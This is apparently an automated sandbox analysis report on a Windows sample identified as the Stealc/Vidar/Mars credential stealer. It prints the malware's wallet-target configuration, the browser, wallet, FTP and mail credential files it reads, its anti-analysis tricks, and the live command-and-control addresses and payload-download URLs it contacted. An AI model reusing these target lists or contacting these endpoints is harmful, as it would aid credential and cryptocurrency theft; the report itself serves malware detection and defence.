Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Tries to harvest and steal Bitcoin Wallet information
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-wal Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shm Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-wal Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-shm Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File opened: C:\Users\user\AppData\Roaming\Exodus\ Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\ Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\ Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File opened: C:\Users\user\AppData\Roaming\Binance\ Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\ Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\ Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\ Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\ Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\ Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004 Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 00000000.00000002.2295449194.00000000005A6000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Rnteb46TuM.exe PID: 6408, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Mars stealer
Source: Yara match File source: 0.2.Rnteb46TuM.exe.500000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.6e6e496542.exe.410000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.2295449194.0000000000501000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2416642437.0000000000411000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Yara detected Stealc
Source: Yara match File source: 0000000C.00000002.2417828325.0000000001715000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2299175818.0000000001A05000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Rnteb46TuM.exe PID: 6408, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 6e6e496542.exe PID: 6448, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: 0.2.Rnteb46TuM.exe.500000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.6e6e496542.exe.410000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.2295449194.0000000000501000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2416642437.0000000000411000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Rnteb46TuM.exe PID: 6408, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1465032 Sample: Rnteb46TuM.exe Startdate: 01/07/2024 Architecture: WINDOWS Score: 100 66 Snort IDS alert for network traffic 2->66 68 Multi AV Scanner detection for domain / URL 2->68 70 Found malware configuration 2->70 72 15 other signatures 2->72 9 Rnteb46TuM.exe 37 2->9         started        14 explorti.exe 2->14         started        16 explorti.exe 2->16         started        process3 dnsIp4 52 85.28.47.4, 49711, 49729, 80 GES-ASRU Russian Federation 9->52 54 77.91.77.81, 49714, 49726, 80 FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU Russian Federation 9->54 40 C:\Users\user\AppData\...\AFBFHDBKJE.exe, PE32 9->40 dropped 42 C:\Users\user\AppData\...\softokn3[1].dll, PE32 9->42 dropped 44 C:\Users\user\AppData\Local\...\nss3[1].dll, PE32 9->44 dropped 46 11 other files (7 malicious) 9->46 dropped 90 Detected unpacking (changes PE section rights) 9->90 92 Tries to steal Mail credentials (via file / registry access) 9->92 94 Found many strings related to Crypto-Wallets (likely being stolen) 9->94 102 4 other signatures 9->102 18 cmd.exe 1 9->18         started        20 cmd.exe 2 9->20         started        96 Hides threads from debuggers 14->96 98 Tries to detect sandboxes / dynamic malware analysis system (registry check) 14->98 100 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 14->100 file5 signatures6 process7 process8 22 AFBFHDBKJE.exe 4 18->22         started        26 conhost.exe 18->26         started        28 conhost.exe 20->28         started        file9 38 C:\Users\user\AppData\Local\...\explorti.exe, PE32 22->38 dropped 82 Antivirus detection for dropped file 22->82 84 Detected unpacking (changes PE section rights) 22->84 86 Machine Learning detection for dropped file 22->86 88 5 other signatures 22->88 30 explorti.exe 16 22->30         started        signatures10 process11 dnsIp12 56 77.91.77.82, 49725, 49728, 49730 FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU Russian Federation 30->56 48 C:\Users\user\AppData\...\6e6e496542.exe, PE32 30->48 dropped 50 C:\Users\user\AppData\Local\...\random[1].exe, PE32 30->50 dropped 58 Antivirus detection for dropped file 30->58 60 Detected unpacking (changes PE section rights) 30->60 62 Tries to detect sandboxes and other dynamic analysis tools (window names) 30->62 64 5 other signatures 30->64 35 6e6e496542.exe 12 30->35         started        file13 signatures14 process15 signatures16 74 Antivirus detection for dropped file 35->74 76 Detected unpacking (changes PE section rights) 35->76 78 Machine Learning detection for dropped file 35->78 80 Hides threads from debuggers 35->80
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
77.91.77.81
 unknown Russian Federation
42861 FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU false
85.28.47.4
 unknown Russian Federation
31643 GES-ASRU true
77.91.77.82
 unknown Russian Federation
42861 FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://77.91.77.81/mine/amadka.exe false
  • 27%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://77.91.77.82/Hun4Ko/index.php true
  • 24%, Virustotal, Browse
  • Avira URL Cloud: phishing
 unknown
http://85.28.47.4/69934896f997d5bb/softokn3.dll true
  • 6%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://85.28.47.4/69934896f997d5bb/mozglue.dll true
  • 7%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://85.28.47.4/69934896f997d5bb/nss3.dll true
  • 9%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://85.28.47.4/69934896f997d5bb/vcruntime140.dll true
  • 7%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://85.28.47.4/69934896f997d5bb/freebl3.dll true
  • 6%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://85.28.47.4/920475a59bac849d.php true
  • 22%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://85.28.47.4/69934896f997d5bb/sqlite3.dll true
  • 23%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://85.28.47.4/69934896f997d5bb/msvcp140.dll true
  • Avira URL Cloud: malware
 unknown